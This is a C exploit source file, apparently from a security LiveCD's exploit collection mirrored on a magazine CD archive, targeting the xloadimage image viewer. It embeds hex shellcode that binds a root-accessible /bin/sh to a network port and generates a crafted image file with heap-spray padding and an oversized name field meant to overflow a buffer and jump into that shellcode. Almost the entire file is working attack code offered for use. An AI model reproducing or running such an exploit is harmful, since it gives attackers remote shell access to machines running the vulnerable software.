home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / xwin / xloadimageexp.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  69 lines
  1. //#define TARGET 0x080e1337
  2. //as 1337 as the 1337357 kiddies.
  3. #define TARGET 0xdeadbeef
  4.  
  5. // lamagra's port binding shell code (from bind.c in the sc.tar.gz)
  6. //
  7. char lamagra_bind_code[] =
  8.   "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
  9.   "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
  10.   "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
  11.   "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
  12.   "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
  13.   "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
  14.   "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
  15.   "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
  16.  
  17. // slight modification so it listens on 7465 instead of 3879
  18. // TAGS is easier to remember ;]
  19.  
  20. char *
  21. this (int doit)
  22. {
  23.   char *p;
  24.   int v;
  25.   p = (char *) malloc (8200);
  26.   memset (p, 0x90, 8200);
  27.   if (!doit)
  28.     for (v = 0; v < 8100; v += 122)
  29.       {
  30.     p[v] = 0xeb;
  31.     p[v + 1] = 120;
  32.       }
  33.   if (doit)
  34.     memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
  35.   p[8199] = 0;
  36.  
  37.   return p;
  38. }
  39.  
  40. main (int argc)
  41. {
  42.   int z0, x = TARGET;
  43.   int z1, y = x;
  44.   int p;
  45.   char *q;
  46.   if (argc > 1)
  47.     printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
  48.   printf ("FirstName: %s\n", this (0));
  49.   printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
  50.   printf ("%s\n", &x);
  51. // Begin Padding Heap With 'Garbage' (nop/jmp)
  52.   printf ("%s", this (0));
  53.   printf ("%s", this (0));
  54.   printf ("%s", this (0));
  55.   printf ("%s", this (0));
  56.   printf ("%s", this (0));
  57.   printf ("%s", this (0));
  58. // End Padding Heap With 'Garbage' (nop/jmp)
  59.   printf ("%s", this (1));
  60.   printf ("http://www.mp3.com/cosv");
  61.   printf ("\nPicData: 32 32 8\n");
  62.   printf ("\n");
  63.   for (p = 0; p < 9994; p += 1)
  64.     printf ("A");
  65. }
  66.  
  67. // EOF --  tstot.c  --
  68.  
  69.